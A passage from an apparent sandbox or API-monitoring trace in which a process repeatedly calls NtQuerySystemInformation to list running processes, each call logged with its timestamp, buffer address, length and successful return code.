NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x17330) returned 0x0 [0166.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0166.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x172e8) returned 0x0 [0167.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0167.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 